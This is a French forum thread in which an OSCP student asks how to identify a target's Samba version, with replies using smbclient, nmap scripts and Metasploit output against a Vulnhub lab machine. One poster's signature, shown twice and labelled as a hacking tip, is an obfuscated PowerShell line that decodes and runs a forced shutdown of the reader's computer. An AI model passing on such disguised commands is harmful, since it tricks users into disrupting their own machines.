Annonce

Réduire
Aucune annonce.

Trouver la version de Samba

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Trouver la version de Samba

    Bonjour,

    Toujours sur ma formation OSCP, je voulais savoir comment vous déterminiez la version Samba de l'ordinateur cible.

    A part en utilisant le module msfconsole : auxiliary/scanner/smb/smb_version qui est restreint lors de l'examen.

    A mon niveau, sur ma version Kali spécifique OSCP : enum4linux ne me renvoie pas la version samba aussi bien le scanner smb de msfconsole.

    J'ai d'autres outils comme nullinux aussi mais toujours pas de version. Pareil pour Nmap.

    Est ce que vous avez des équivalents python ou autre de ce scanner?

    Merci

    F0ngic
    Dernière modification par F0ngic, 03 octobre 2018, 10h45. Motif: Faute orthographe

  • #2
    Salut,

    Et juste avec smbclient ? :

    $ smbclient -L //188.X.X.X

    Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu]

    Sharename Type Comment
    --------- ---- -------
    print$ Disk Printer Drivers
    IPC$ IPC IPC Service (xxxxx server (Samba, Ubuntu)



    Sinon à partir de nmap 7.60, t'as le script smb-protocols : https://nmap.org/nsedoc/scripts/smb-protocols.html

    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Merci Krisscool pour ta réponse,

      J'ai fait quelques tests de mon coté et effectivement cela fonctionne mais pas sur toutes les machines.

      En prenant par exemple la vulnhub de Ktrix Lvl 1 sur vulnhub, lorsque je fais les commandes voilà ce que cela me donne :

      smbclient -L //192.168.xxx.xxx

      Sharename Type Comment
      --------- ---- -------
      IPC$ IPC IPC Service (Samba Server)
      ADMIN$ IPC IPC Service (Samba Server)

      Le script nmap smb-protocols ne me renvoie aucune information

      Par contre le script smbversion de msfconsole me renvoie la version directement :

      msf auxiliary(scanner/smb/smb_version) > set rhosts 192.168.xxx.xxx
      rhosts => 192.168.xxx.xxx
      msf auxiliary(scanner/smb/smb_version) > run[*] 192.168.xxx.xxx:139 - Host could not be identified: Unix (Samba 2.2.1a)[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed


      Donc je suis de retour à la case départ, à moins d'arriver à porter le module metasploit en stand alone.
      Dernière modification par F0ngic, 05 octobre 2018, 09h46. Motif: IP

      Commentaire


      • #4
        Quand la version est absente de la bannière de réponse du serveur, le fingerprinting devient plus "aléatoire" (analyse du comportement du service distant face à différentes requêtes). Dans ces conditions, même pas certain que smbversion de metasploit soit 100% fiable.
        Mais c'est sans doute mieux que rien il est vrai.

        Je panne rien au Ruby, je ne pourrais hélas pas t'aider pour l'adaptation du module metasploit en standalone :'

        Dernière modification par Krisscool, 05 octobre 2018, 10h09.
        Hack like a pro :
        PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

        Commentaire


        • #5
          Il y a dans la configuration de samba une option pour changer la bannière de samba.
          Je crois que c'est : "server = %h "

          Liens:
          https://doc.ubuntu-fr.org/samba_smb.conf

          Sinon, tu peux modifier le code ruby de metasploit pour enlever la méthode "check" de l'exploit ?

          Commentaire


          • #6
            Envoyé par miwor Voir le message
            Il y a dans la configuration de samba une option pour changer la bannière de samba.
            Je crois que c'est : "server = %h "

            Liens:
            https://doc.ubuntu-fr.org/samba_smb.conf

            Sinon, tu peux modifier le code ruby de metasploit pour enlever la méthode "check" de l'exploit ?
            Euh je n'y connais rien en ruby, mais je devrai essayer pour voir ce que cela donne.
            J'avais trouvé un lien pour porter les exploits metasploit en stand alone, il va falloir que j'y rejette un coup d'oeil.

            Merci pour ta réponse,

            F0ngic

            Commentaire

            Chargement...
            X